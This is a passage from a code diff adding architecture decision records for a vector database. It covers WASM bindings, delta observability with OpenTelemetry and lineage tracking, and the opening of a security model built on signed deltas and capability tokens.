#[wasm_bindgen(js_name = writeDelta)]
pub fn write_delta(&mut self, delta: JsValue) -> Result<usize, JsError> {
let delta: VectorDelta = serde_wasm_bindgen::from_value(delta)?;
let encoded = encode_delta(&delta)?;
// Check capacity
if self.write_pos + encoded.len() > self.capacity {
return Err(JsError::new("Buffer full"));
}
// Write length prefix + data
let len_bytes = (encoded.len() as u32).to_le_bytes();
self.buffer[self.write_pos..self.write_pos + 4].copy_from_slice(&len_bytes);
self.write_pos += 4;
self.buffer[self.write_pos..self.write_pos + encoded.len()].copy_from_slice(&encoded);
self.write_pos += encoded.len();
Ok(self.write_pos)
}
/// Flush buffer and apply all deltas
#[wasm_bindgen(js_name = flush)]
pub fn flush(&mut self, db: &mut DeltaVectorDB) -> Result<usize, JsError> {
let mut count = 0;
self.read_pos = 0;
while self.read_pos < self.write_pos {
// Read length prefix
let len_bytes: [u8; 4] = self.buffer[self.read_pos..self.read_pos + 4]
.try_into()
.unwrap();
let len = u32::from_le_bytes(len_bytes) as usize;
self.read_pos += 4;
// Decode and apply delta
let encoded = &self.buffer[self.read_pos..self.read_pos + len];
let delta = decode_delta(encoded)?;
db.inner.apply_delta(delta)?;
self.read_pos += len;
count += 1;
}
// Reset buffer
self.write_pos = 0;
self.read_pos = 0;
Ok(count)
}
}
```
### JavaScript Integration
```typescript
// High-performance delta streaming using SharedArrayBuffer (when available)
class DeltaStreamProcessor {
private db: DeltaVectorDB;
private pool: SharedDeltaPool;
private worker?: Worker;
constructor(db: DeltaVectorDB, poolSize: number = 1024 * 1024) {
this.db = db;
this.pool = new SharedDeltaPool(poolSize);
// Use Web Worker for background processing if available
if (typeof Worker !== 'undefined') {
this.initWorker();
}
}
private initWorker() {
const workerCode = `
self.onmessage = function(e) {
const { type, data } = e.data;
if (type === 'process') {
// Process deltas in worker
self.postMessage({ type: 'done', count: data.length });
}
};
`;
const blob = new Blob([workerCode], { type: 'application/javascript' });
this.worker = new Worker(URL.createObjectURL(blob));
}
// Stream deltas with batching
async streamDeltas(deltas: AsyncIterable<VectorDelta>): Promise<number> {
let count = 0;
let batch: VectorDelta[] = [];
const BATCH_SIZE = 100;
for await (const delta of deltas) {
batch.push(delta);
if (batch.length >= BATCH_SIZE) {
count += await this.processBatch(batch);
batch = [];
}
}
// Process remaining
if (batch.length > 0) {
count += await this.processBatch(batch);
}
return count;
}
private async processBatch(deltas: VectorDelta[]): Promise<number> {
// Write to shared pool
for (const delta of deltas) {
this.pool.writeDelta(delta);
}
// Flush to database
return this.pool.flush(this.db);
}
// Zero-copy vector access
getVectorView(id: string): Float32Array | null {
const ptr = this.db.getVectorPtr(id);
if (ptr === 0) return null;
const dims = this.db.getDimensions();
const memory = this.db.getMemory();
// Create view directly into WASM memory
return new Float32Array(memory.buffer, ptr, dims);
}
}
```
---
## Performance Considerations
### Serialization Overhead
| Method | Size (bytes) | Encode (us) | Decode (us) |
|--------|--------------|-------------|-------------|
| JSON | 500 | 50 | 30 |
| serde_wasm_bindgen | 200 | 20 | 15 |
| Manual binary | 100 | 5 | 3 |
| Zero-copy (view) | 0 | 0.1 | 0.1 |
### Memory Usage
| Component | Memory | Notes |
|-----------|--------|-------|
| WASM linear memory | 1MB initial | Grows as needed |
| Delta pool | 1MB | Configurable |
| Vector storage | ~4B * dims * count | Grows with data |
| HNSW index | ~640B * count | Graph structure |
### Benchmarks (Chrome, 10K vectors, 384 dims)
| Operation | Native | WASM | Ratio |
|-----------|--------|------|-------|
| Apply delta (sparse 5%) | 5us | 15us | 3x |
| Apply delta (dense) | 10us | 25us | 2.5x |
| Get vector | 0.5us | 5us | 10x |
| Search k=10 | 100us | 300us | 3x |
| Batch apply (100) | 200us | 400us | 2x |
---
## Considered Options
### Option 1: Full Serialization Every Call
**Description**: Serialize/deserialize on each API call.
**Pros**:
- Simple implementation
- Works everywhere
**Cons**:
- High overhead
- Memory copying
- GC pressure in JS
**Verdict**: Used for complex objects, not for bulk data.
### Option 2: SharedArrayBuffer
**Description**: True shared memory between JS and WASM.
**Pros**:
- Zero-copy possible
- Highest performance
**Cons**:
- Requires COOP/COEP headers
- Not available in all contexts
- Complex synchronization
**Verdict**: Optional optimization when available.
### Option 3: Component Model (Selected)
**Description**: WASM Component Model with resource types.
**Pros**:
- Clean interface definitions
- Future-proof (standard)
- Better than wasm-bindgen long-term
**Cons**:
- Still maturing
- Browser support varies
**Verdict**: Adopted as target, with wasm-bindgen fallback.
### Option 4: Direct Memory Access
**Description**: Expose raw memory pointers.
**Pros**:
- Maximum performance
- Zero overhead
**Cons**:
- Unsafe
- Manual memory management
- Easy to corrupt state
**Verdict**: Used internally, not exposed to JS.
---
## Technical Specification
### Interface Definition (WIT)
```wit
// delta-vector.wit (Component Model interface)
package ruvector:delta@0.1.0;
interface delta-types {
// Delta identifier
type delta-id = string;
type vector-id = string;
// Delta operations
variant delta-operation {
create(list<float32>),
sparse(sparse-update),
dense(list<float32>),
scale(float32),
offset(float32),
delete,
}
record sparse-update {
indices: list<u32>,
values: list<float32>,
}
record vector-delta {
vector-id: vector-id,
operation: delta-operation,
timestamp: option<u64>,
}
record search-result {
id: vector-id,
score: float32,
}
}
interface delta-db {
use delta-types.{delta-id, vector-id, vector-delta, search-result};
// Resource representing the database
resource database {
constructor(dimensions: u32);
apply-delta: func(delta: vector-delta) -> result<delta-id, string>;
apply-deltas: func(deltas: list<vector-delta>) -> result<list<delta-id>, string>;
get-vector: func(id: vector-id) -> option<list<float32>>;
search: func(query: list<float32>, k: u32) -> list<search-result>;
export: func() -> list<u8>;
import: func(data: list<u8>) -> result<_, string>;
}
}
world delta-vector-world {
export delta-db;
}
```
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
#[wasm_bindgen]
pub struct DeltaDBOptions {
/// Vector dimensions
pub dimensions: u32,
/// Maximum vectors
pub max_vectors: u32,
/// Enable compression
pub compression: bool,
/// Checkpoint interval (deltas)
pub checkpoint_interval: u32,
/// HNSW configuration
pub hnsw_m: u32,
pub hnsw_ef_construction: u32,
pub hnsw_ef_search: u32,
}
impl Default for DeltaDBOptions {
fn default() -> Self {
Self {
dimensions: 384,
max_vectors: 100_000,
compression: true,
checkpoint_interval: 100,
hnsw_m: 16,
hnsw_ef_construction: 100,
hnsw_ef_search: 50,
}
}
}
```
---
## Consequences
### Benefits
1. **Browser Deployment**: Delta operations in web applications
2. **Edge Computing**: Run on WASM-capable edge nodes
3. **Unified Codebase**: Same delta logic for all platforms
4. **Streaming Support**: Real-time delta processing in browser
5. **Persistence Options**: Export/import for IndexedDB
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Performance gap | High | Medium | Zero-copy patterns, batching |
| Memory limits | Medium | High | Streaming, compression |
| Browser compatibility | Low | Medium | Feature detection, fallbacks |
| Component Model changes | Medium | Low | Abstraction layer |
---
## References
1. WebAssembly Component Model. https://component-model.bytecodealliance.org/
2. wasm-bindgen Reference. https://rustwasm.github.io/wasm-bindgen/
3. ADR-001: Ruvector Core Architecture (WASM section)
4. ADR-DB-001: Delta Behavior Core Architecture
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-006**: Delta Compression Strategy
- **ADR-005**: WASM Runtime Integration

View File

@@ -0,0 +1,787 @@
# ADR-DB-009: Delta Observability
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Observability Challenge
Delta-first architecture introduces new debugging and monitoring needs:
1. **Delta Lineage**: Understanding where a vector's current state came from
2. **Performance Tracing**: Identifying bottlenecks in delta pipelines
3. **Anomaly Detection**: Spotting unusual delta patterns
4. **Debugging**: Reconstructing state at any point in time
5. **Auditing**: Compliance requirements for tracking changes
### Observability Pillars
| Pillar | Delta-Specific Need |
|--------|---------------------|
| Metrics | Delta rates, composition times, compression ratios |
| Tracing | Delta propagation paths, end-to-end latency |
| Logging | Delta events, conflicts, compactions |
| Lineage | Delta chains, causal dependencies |
---
## Decision
### Adopt Delta Lineage Tracking with OpenTelemetry Integration
We implement comprehensive delta observability with lineage tracking as a first-class feature.
### Architecture Overview
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ OBSERVABILITY LAYER │
└─────────────────────────────────────────────────────────────────────────────┘
┌───────────────────────────┼───────────────────────────────┐
│ │ │
v v v
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ METRICS │ │ TRACING │ │ LINEAGE │
│ │ │ │ │ │
│ - Delta rates │ │ - Propagation │ │ - Delta chains│
│ - Latencies │ │ - Conflicts │ │ - Causal DAG │
│ - Compression │ │ - Compaction │ │ - Snapshots │
│ - Queue depths│ │ - Searches │ │ - Provenance │
└───────────────┘ └───────────────┘ └───────────────┘
│ │ │
v v v
┌─────────────────────────────────────────────────────────────────────────────┐
│ OPENTELEMETRY EXPORTER │
│ Prometheus │ Jaeger │ OTLP │ Custom Lineage Store │
└─────────────────────────────────────────────────────────────────────────────┘
```
### Core Components
#### 1. Delta Lineage Tracker
```rust
/// Tracks delta lineage and causal relationships
pub struct DeltaLineageTracker {
/// Delta dependency graph
dag: DeltaDAG,
/// Vector state snapshots
snapshots: SnapshotStore,
/// Lineage query interface
query: LineageQuery,
/// Configuration
config: LineageConfig,
}
/// Directed Acyclic Graph of delta dependencies
pub struct DeltaDAG {
/// Nodes: delta IDs
nodes: DashMap<DeltaId, DeltaNode>,
/// Edges: causal dependencies
edges: DashMap<(DeltaId, DeltaId), EdgeMetadata>,
/// Index by vector ID
by_vector: DashMap<VectorId, Vec<DeltaId>>,
/// Index by timestamp
by_time: BTreeMap<DateTime<Utc>, Vec<DeltaId>>,
}
#[derive(Debug, Clone)]
pub struct DeltaNode {
/// Delta identifier
pub delta_id: DeltaId,
/// Target vector
pub vector_id: VectorId,
/// Operation type
pub operation_type: OperationType,
/// Creation timestamp
pub created_at: DateTime<Utc>,
/// Source replica
pub origin: ReplicaId,
/// Parent delta (if any)
pub parent: Option<DeltaId>,
/// Trace context
pub trace_context: Option<TraceContext>,
/// Additional metadata
pub metadata: HashMap<String, Value>,
}
impl DeltaLineageTracker {
/// Record a new delta in the lineage
pub fn record_delta(&self, delta: &VectorDelta, context: &DeltaContext) {
let node = DeltaNode {
delta_id: delta.delta_id.clone(),
vector_id: delta.vector_id.clone(),
operation_type: delta.operation.operation_type(),
created_at: delta.timestamp,
origin: delta.origin_replica.clone(),
parent: delta.parent_delta.clone(),
trace_context: context.trace_context.clone(),
metadata: context.metadata.clone(),
};
// Insert node
self.dag.nodes.insert(delta.delta_id.clone(), node);
// Add edge to parent
if let Some(parent) = &delta.parent_delta {
self.dag.edges.insert(
(parent.clone(), delta.delta_id.clone()),
EdgeMetadata {
edge_type: EdgeType::CausalDependency,
created_at: Utc::now(),
},
);
}
// Update indexes
self.dag.by_vector
.entry(delta.vector_id.clone())
.or_default()
.push(delta.delta_id.clone());
self.dag.by_time
.entry(delta.timestamp)
.or_default()
.push(delta.delta_id.clone());
}
/// Get lineage for a vector
pub fn get_lineage(&self, vector_id: &VectorId) -> DeltaLineage {
let delta_ids = self.dag.by_vector.get(vector_id)
.map(|v| v.clone())
.unwrap_or_default();
let nodes: Vec<_> = delta_ids.iter()
.filter_map(|id| self.dag.nodes.get(id).map(|n| n.clone()))
.collect();
DeltaLineage {
vector_id: vector_id.clone(),
deltas: nodes,
chain_length: delta_ids.len(),
}
}
/// Get causal ancestors of a delta
pub fn get_ancestors(&self, delta_id: &DeltaId) -> Vec<DeltaId> {
let mut ancestors = Vec::new();
let mut queue = VecDeque::new();
let mut visited = HashSet::new();
queue.push_back(delta_id.clone());
while let Some(current) = queue.pop_front() {
if visited.contains(&current) {
continue;
}
visited.insert(current.clone());
if let Some(node) = self.dag.nodes.get(&current) {
if let Some(parent) = &node.parent {
ancestors.push(parent.clone());
queue.push_back(parent.clone());
}
}
}
ancestors
}
/// Find common ancestor of two deltas
pub fn find_common_ancestor(&self, a: &DeltaId, b: &DeltaId) -> Option<DeltaId> {
let ancestors_a: HashSet<_> = self.get_ancestors(a).into_iter().collect();
for ancestor in self.get_ancestors(b) {
if ancestors_a.contains(&ancestor) {
return Some(ancestor);
}
}
None
}
}
```
#### 2. Metrics Collector
```rust
use opentelemetry::metrics::{Counter, Histogram, Meter};
/// Delta-specific metrics
pub struct DeltaMetrics {
/// Delta application counter
deltas_applied: Counter<u64>,
/// Delta application latency
apply_latency: Histogram<f64>,
/// Composition latency
compose_latency: Histogram<f64>,
/// Compression ratio
compression_ratio: Histogram<f64>,
/// Delta chain length
chain_length: Histogram<f64>,
/// Conflict counter
conflicts: Counter<u64>,
/// Queue depth gauge
queue_depth: ObservableGauge<u64>,
/// Checkpoint counter
checkpoints: Counter<u64>,
/// Compaction counter
compactions: Counter<u64>,
}
impl DeltaMetrics {
pub fn new(meter: &Meter) -> Self {
Self {
deltas_applied: meter
.u64_counter("ruvector.delta.applied")
.with_description("Number of deltas applied")
.init(),
apply_latency: meter
.f64_histogram("ruvector.delta.apply_latency")
.with_description("Delta application latency in milliseconds")
.with_unit(Unit::new("ms"))
.init(),
compose_latency: meter
.f64_histogram("ruvector.delta.compose_latency")
.with_description("Vector composition latency")
.with_unit(Unit::new("ms"))
.init(),
compression_ratio: meter
.f64_histogram("ruvector.delta.compression_ratio")
.with_description("Compression ratio achieved")
.init(),
chain_length: meter
.f64_histogram("ruvector.delta.chain_length")
.with_description("Delta chain length at composition")
.init(),
conflicts: meter
.u64_counter("ruvector.delta.conflicts")
.with_description("Number of delta conflicts detected")
.init(),
queue_depth: meter
.u64_observable_gauge("ruvector.delta.queue_depth")
.with_description("Current depth of delta queue")
.init(),
checkpoints: meter
.u64_counter("ruvector.delta.checkpoints")
.with_description("Number of checkpoints created")
.init(),
compactions: meter
.u64_counter("ruvector.delta.compactions")
.with_description("Number of compactions performed")
.init(),
}
}
/// Record delta application
pub fn record_delta_applied(
&self,
operation_type: &str,
vector_id: &str,
latency_ms: f64,
) {
let attributes = [
KeyValue::new("operation_type", operation_type.to_string()),
];
self.deltas_applied.add(1, &attributes);
self.apply_latency.record(latency_ms, &attributes);
}
/// Record vector composition
pub fn record_composition(
&self,
chain_length: usize,
latency_ms: f64,
) {
self.chain_length.record(chain_length as f64, &[]);
self.compose_latency.record(latency_ms, &[]);
}
/// Record conflict
pub fn record_conflict(&self, resolution_strategy: &str) {
self.conflicts.add(1, &[
KeyValue::new("strategy", resolution_strategy.to_string()),
]);
}
}
```
#### 3. Distributed Tracing
```rust
use opentelemetry::trace::{Tracer, Span, SpanKind};
/// Delta operation tracing
pub struct DeltaTracer {
tracer: Arc<dyn Tracer + Send + Sync>,
}
impl DeltaTracer {
/// Start a trace span for delta application
pub fn trace_apply_delta(&self, delta: &VectorDelta) -> impl Span {
let span = self.tracer.span_builder("delta.apply")
.with_kind(SpanKind::Internal)
.with_attributes(vec![
KeyValue::new("delta.id", delta.delta_id.to_string()),
KeyValue::new("delta.vector_id", delta.vector_id.to_string()),
KeyValue::new("delta.operation", delta.operation.type_name()),
])
.start(&self.tracer);
span
}
/// Trace delta propagation
pub fn trace_propagation(&self, delta: &VectorDelta, target: &str) -> impl Span {
self.tracer.span_builder("delta.propagate")
.with_kind(SpanKind::Producer)
.with_attributes(vec![
KeyValue::new("delta.id", delta.delta_id.to_string()),
KeyValue::new("target", target.to_string()),
])
.start(&self.tracer)
}
/// Trace conflict resolution
pub fn trace_conflict_resolution(
&self,
delta_a: &DeltaId,
delta_b: &DeltaId,
strategy: &str,
) -> impl Span {
self.tracer.span_builder("delta.conflict.resolve")
.with_kind(SpanKind::Internal)
.with_attributes(vec![
KeyValue::new("delta.a", delta_a.to_string()),
KeyValue::new("delta.b", delta_b.to_string()),
KeyValue::new("strategy", strategy.to_string()),
])
.start(&self.tracer)
}
/// Trace vector composition
pub fn trace_composition(
&self,
vector_id: &VectorId,
chain_length: usize,
) -> impl Span {
self.tracer.span_builder("delta.compose")
.with_kind(SpanKind::Internal)
.with_attributes(vec![
KeyValue::new("vector.id", vector_id.to_string()),
KeyValue::new("chain.length", chain_length as i64),
])
.start(&self.tracer)
}
}
/// Trace context for cross-process propagation
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TraceContext {
pub trace_id: String,
pub span_id: String,
pub trace_flags: u8,
pub trace_state: Option<String>,
}
impl TraceContext {
/// Extract from W3C Trace Context header
pub fn from_traceparent(header: &str) -> Option<Self> {
let parts: Vec<&str> = header.split('-').collect();
if parts.len() != 4 {
return None;
}
Some(Self {
trace_id: parts[1].to_string(),
span_id: parts[2].to_string(),
trace_flags: u8::from_str_radix(parts[3], 16).ok()?,
trace_state: None,
})
}
/// Convert to W3C Trace Context header
pub fn to_traceparent(&self) -> String {
format!(
"00-{}-{}-{:02x}",
self.trace_id, self.span_id, self.trace_flags
)
}
}
```
#### 4. Event Logging
```rust
use tracing::{info, warn, error, debug, instrument};
/// Delta event logger with structured logging
pub struct DeltaEventLogger {
/// Log level configuration
config: LogConfig,
}
impl DeltaEventLogger {
/// Log delta application
#[instrument(
name = "delta_applied",
skip(self, delta),
fields(
delta.id = %delta.delta_id,
delta.vector_id = %delta.vector_id,
delta.operation = %delta.operation.type_name(),
)
)]
pub fn log_delta_applied(&self, delta: &VectorDelta, latency: Duration) {
info!(
latency_us = latency.as_micros() as u64,
"Delta applied successfully"
);
}
/// Log conflict detection
#[instrument(
name = "delta_conflict",
skip(self),
fields(
delta.a = %delta_a,
delta.b = %delta_b,
)
)]
pub fn log_conflict(
&self,
delta_a: &DeltaId,
delta_b: &DeltaId,
resolution: &str,
) {
warn!(
resolution = resolution,
"Delta conflict detected and resolved"
);
}
/// Log compaction event
#[instrument(
name = "delta_compaction",
skip(self),
fields(
vector.id = %vector_id,
)
)]
pub fn log_compaction(
&self,
vector_id: &VectorId,
deltas_merged: usize,
space_saved: usize,
) {
info!(
deltas_merged = deltas_merged,
space_saved_bytes = space_saved,
"Delta chain compacted"
);
}
/// Log checkpoint creation
#[instrument(
name = "delta_checkpoint",
skip(self),
fields(
vector.id = %vector_id,
)
)]
pub fn log_checkpoint(
&self,
vector_id: &VectorId,
at_delta: &DeltaId,
) {
debug!(
at_delta = %at_delta,
"Checkpoint created"
);
}
/// Log propagation event
#[instrument(
name = "delta_propagation",
skip(self),
fields(
delta.id = %delta_id,
target = %target,
)
)]
pub fn log_propagation(&self, delta_id: &DeltaId, target: &str, success: bool) {
if success {
debug!("Delta propagated successfully");
} else {
error!("Delta propagation failed");
}
}
}
```
### Lineage Query API
```rust
/// Query interface for delta lineage
pub struct LineageQuery {
tracker: Arc<DeltaLineageTracker>,
}
impl LineageQuery {
/// Reconstruct vector at specific time
pub fn vector_at_time(
&self,
vector_id: &VectorId,
timestamp: DateTime<Utc>,
) -> Result<Vec<f32>> {
let lineage = self.tracker.get_lineage(vector_id);
// Filter deltas before timestamp
let relevant_deltas: Vec<_> = lineage.deltas
.into_iter()
.filter(|d| d.created_at <= timestamp)
.collect();
// Compose from filtered deltas
self.compose_from_deltas(&relevant_deltas)
}
/// Get all changes to a vector in time range
pub fn changes_in_range(
&self,
vector_id: &VectorId,
start: DateTime<Utc>,
end: DateTime<Utc>,
) -> Vec<DeltaNode> {
let lineage = self.tracker.get_lineage(vector_id);
lineage.deltas
.into_iter()
.filter(|d| d.created_at >= start && d.created_at <= end)
.collect()
}
/// Diff between two points in time
pub fn diff(
&self,
vector_id: &VectorId,
time_a: DateTime<Utc>,
time_b: DateTime<Utc>,
) -> Result<VectorDiff> {
let vector_a = self.vector_at_time(vector_id, time_a)?;
let vector_b = self.vector_at_time(vector_id, time_b)?;
let changes: Vec<_> = vector_a.iter()
.zip(vector_b.iter())
.enumerate()
.filter(|(_, (a, b))| (a - b).abs() > 1e-7)
.map(|(i, (a, b))| DimensionChange {
index: i,
from: *a,
to: *b,
})
.collect();
Ok(VectorDiff {
vector_id: vector_id.clone(),
from_time: time_a,
to_time: time_b,
changes,
l2_distance: euclidean_distance(&vector_a, &vector_b),
})
}
/// Find which delta caused a dimension change
pub fn blame(
&self,
vector_id: &VectorId,
dimension: usize,
) -> Option<DeltaNode> {
let lineage = self.tracker.get_lineage(vector_id);
// Find last delta that modified this dimension
lineage.deltas
.into_iter()
.rev()
.find(|d| self.delta_affects_dimension(d, dimension))
}
}
```
---
## Tracing and Metrics Reference
### Metrics
| Metric | Type | Description |
|--------|------|-------------|
| `ruvector.delta.applied` | Counter | Total deltas applied |
| `ruvector.delta.apply_latency` | Histogram | Apply latency (ms) |
| `ruvector.delta.compose_latency` | Histogram | Composition latency (ms) |
| `ruvector.delta.compression_ratio` | Histogram | Compression ratio |
| `ruvector.delta.chain_length` | Histogram | Chain length at composition |
| `ruvector.delta.conflicts` | Counter | Conflicts detected |
| `ruvector.delta.queue_depth` | Gauge | Queue depth |
| `ruvector.delta.checkpoints` | Counter | Checkpoints created |
| `ruvector.delta.compactions` | Counter | Compactions performed |
### Span Names
| Span | Kind | Description |
|------|------|-------------|
| `delta.apply` | Internal | Delta application |
| `delta.propagate` | Producer | Delta propagation |
| `delta.conflict.resolve` | Internal | Conflict resolution |
| `delta.compose` | Internal | Vector composition |
| `delta.checkpoint` | Internal | Checkpoint creation |
| `delta.compact` | Internal | Chain compaction |
| `delta.search` | Internal | Search with delta awareness |
---
## Considered Options
### Option 1: Minimal Logging
**Description**: Basic log statements only.
**Pros**:
- Simple
- Low overhead
**Cons**:
- Poor debugging
- No lineage
- No distributed tracing
**Verdict**: Rejected - insufficient for production.
### Option 2: Custom Observability Stack
**Description**: Build custom metrics and tracing.
**Pros**:
- Full control
- Optimized for deltas
**Cons**:
- Maintenance burden
- No ecosystem integration
- Reinventing wheel
**Verdict**: Rejected - OpenTelemetry provides better value.
### Option 3: OpenTelemetry Integration (Selected)
**Description**: Full OpenTelemetry integration with delta-specific lineage.
**Pros**:
- Industry standard
- Ecosystem integration
- Flexible exporters
- Future-proof
**Cons**:
- Some overhead
- Learning curve
**Verdict**: Adopted - standard with delta-specific extensions.
---
## Technical Specification
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ObservabilityConfig {
/// Enable metrics collection
pub metrics_enabled: bool,
/// Enable distributed tracing
pub tracing_enabled: bool,
/// Enable lineage tracking
pub lineage_enabled: bool,
/// Lineage retention period
pub lineage_retention: Duration,
/// Sampling rate for tracing (0.0 to 1.0)
pub trace_sampling_rate: f32,
/// OTLP endpoint for export
pub otlp_endpoint: Option<String>,
/// Prometheus endpoint
pub prometheus_port: Option<u16>,
}
impl Default for ObservabilityConfig {
fn default() -> Self {
Self {
metrics_enabled: true,
tracing_enabled: true,
lineage_enabled: true,
lineage_retention: Duration::from_secs(86400 * 7), // 7 days
trace_sampling_rate: 0.1, // 10%
otlp_endpoint: None,
prometheus_port: Some(9090),
}
}
}
```
---
## Consequences
### Benefits
1. **Debugging**: Full delta history and lineage
2. **Performance Analysis**: Detailed latency metrics
3. **Compliance**: Audit trail for all changes
4. **Integration**: Works with existing observability tools
5. **Temporal Queries**: Reconstruct state at any time
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Performance overhead | Medium | Medium | Sampling, async export |
| Storage growth | Medium | Medium | Retention policies |
| Complexity | Medium | Low | Configuration presets |
---
## References
1. OpenTelemetry Specification. https://opentelemetry.io/docs/specs/
2. W3C Trace Context. https://www.w3.org/TR/trace-context/
3. ADR-DB-001: Delta Behavior Core Architecture
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-003**: Delta Propagation Protocol
- **ADR-DB-010**: Delta Security Model

View File

@@ -0,0 +1,847 @@
# ADR-DB-010: Delta Security Model
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board, Security Team
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Security Challenge
Delta-first architecture introduces new attack surfaces:
1. **Delta Integrity**: Deltas could be tampered with in transit or storage
2. **Authorization**: Who can create, modify, or read deltas?
3. **Replay Attacks**: Resubmission of old deltas
4. **Information Leakage**: Delta patterns reveal update frequency
5. **Denial of Service**: Flood of malicious deltas
### Threat Model
| Threat Actor | Capability | Goal |
|--------------|------------|------|
| External Attacker | Network access | Data exfiltration, corruption |
| Malicious Insider | API access | Unauthorized modifications |
| Compromised Replica | Full replica access | State corruption |
| Network Adversary | Traffic interception | Delta manipulation |
### Security Requirements
| Requirement | Priority | Description |
|-------------|----------|-------------|
| Integrity | Critical | Detect tampered deltas |
| Authentication | Critical | Verify delta origin |
| Authorization | High | Enforce access control |
| Confidentiality | Medium | Protect delta contents |
| Non-repudiation | Medium | Prove delta authorship |
| Availability | High | Resist DoS attacks |
---
## Decision
### Adopt Signed Deltas with Capability Tokens
We implement a defense-in-depth security model with cryptographically signed deltas and fine-grained capability-based authorization.
### Architecture Overview
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ SECURITY PERIMETER │
│ │
│ ┌───────────────┐ ┌───────────────┐ ┌───────────────┐ ┌──────────────┐ │
│ │ TLS 1.3 │ │ mTLS │ │ Rate Limit │ │ WAF │ │
│ │ Transport │ │ Auth │ │ (per-client) │ │ (optional) │ │
│ └───────────────┘ └───────────────┘ └───────────────┘ └──────────────┘ │
└─────────────────────────────────────────────────────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────────────────────┐
│ AUTHENTICATION LAYER │
│ │
│ ┌───────────────────────────────────────────────────────────────────────┐ │
│ │ Identity Verification │ │
│ │ API Key │ JWT │ Client Certificate │ Capability Token │ │
│ └───────────────────────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────────────────────┐
│ AUTHORIZATION LAYER │
│ │
│ ┌────────────────┐ ┌────────────────┐ ┌────────────────────────────────┐│
│ │ Capability │ │ RBAC │ │ Namespace Isolation ││
│ │ Tokens │ │ Policies │ │ ││
│ └────────────────┘ └────────────────┘ └────────────────────────────────┘│
└─────────────────────────────────────────────────────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────────────────────┐
│ DELTA SECURITY │
│ │
│ ┌────────────────┐ ┌────────────────┐ ┌────────────────────────────────┐│
│ │ Signature │ │ Replay │ │ Integrity ││
│ │ Verification │ │ Protection │ │ Validation ││
│ └────────────────┘ └────────────────┘ └────────────────────────────────┘│
└─────────────────────────────────────────────────────────────────────────────┘
```
### Core Components
#### 1. Signed Deltas
```rust
use ed25519_dalek::{Signature, SigningKey, VerifyingKey};
use sha2::{Sha256, Digest};
/// A cryptographically signed delta
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SignedDelta {
/// The delta content
pub delta: VectorDelta,
/// Ed25519 signature over delta hash
pub signature: Signature,
/// Signing key identifier
pub key_id: KeyId,
/// Timestamp of signing
pub signed_at: DateTime<Utc>,
/// Nonce for replay protection
pub nonce: [u8; 16],
}
/// Delta signer for creating signed deltas
pub struct DeltaSigner {
/// Signing key
signing_key: SigningKey,
/// Key identifier
key_id: KeyId,
/// Nonce tracker
nonce_tracker: NonceTracker,
}
impl DeltaSigner {
/// Sign a delta
pub fn sign(&self, delta: VectorDelta) -> Result<SignedDelta, SigningError> {
// Generate nonce
let nonce = self.nonce_tracker.generate();
// Create signing payload
let payload = SigningPayload {
delta: &delta,
nonce: &nonce,
timestamp: Utc::now(),
};
// Compute hash
let hash = self.compute_payload_hash(&payload);
// Sign hash
let signature = self.signing_key.sign(&hash);
Ok(SignedDelta {
delta,
signature,
key_id: self.key_id.clone(),
signed_at: payload.timestamp,
nonce,
})
}
fn compute_payload_hash(&self, payload: &SigningPayload) -> [u8; 32] {
let mut hasher = Sha256::new();
// Hash delta content
hasher.update(&bincode::serialize(&payload.delta).unwrap());
// Hash nonce
hasher.update(payload.nonce);
// Hash timestamp
hasher.update(&payload.timestamp.timestamp().to_le_bytes());
hasher.finalize().into()
}
}
/// Delta verifier for validating signed deltas
pub struct DeltaVerifier {
/// Known public keys
public_keys: DashMap<KeyId, VerifyingKey>,
/// Nonce store for replay protection
nonce_store: NonceStore,
/// Clock skew tolerance
clock_tolerance: Duration,
}
impl DeltaVerifier {
/// Verify a signed delta
pub fn verify(&self, signed_delta: &SignedDelta) -> Result<(), VerificationError> {
// Check key exists
let public_key = self.public_keys
.get(&signed_delta.key_id)
.ok_or(VerificationError::UnknownKey)?;
// Check timestamp is recent
let age = Utc::now().signed_duration_since(signed_delta.signed_at);
if age.abs() > self.clock_tolerance.as_secs() as i64 {
return Err(VerificationError::ExpiredOrFuture);
}
// Check nonce hasn't been used
if self.nonce_store.is_used(&signed_delta.nonce) {
return Err(VerificationError::ReplayDetected);
}
// Verify signature
let payload = SigningPayload {
delta: &signed_delta.delta,
nonce: &signed_delta.nonce,
timestamp: signed_delta.signed_at,
};
let hash = self.compute_payload_hash(&payload);
public_key.verify(&hash, &signed_delta.signature)
.map_err(|_| VerificationError::InvalidSignature)?;
// Mark nonce as used
self.nonce_store.mark_used(signed_delta.nonce);
Ok(())
}
}
```
#### 2. Capability Tokens
```rust
/// Capability token for fine-grained authorization
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CapabilityToken {
/// Token identifier
pub token_id: TokenId,
/// Subject (who this token is for)
pub subject: Subject,
/// Granted capabilities
pub capabilities: Vec<Capability>,
/// Token issuer
pub issuer: String,
/// Issued at
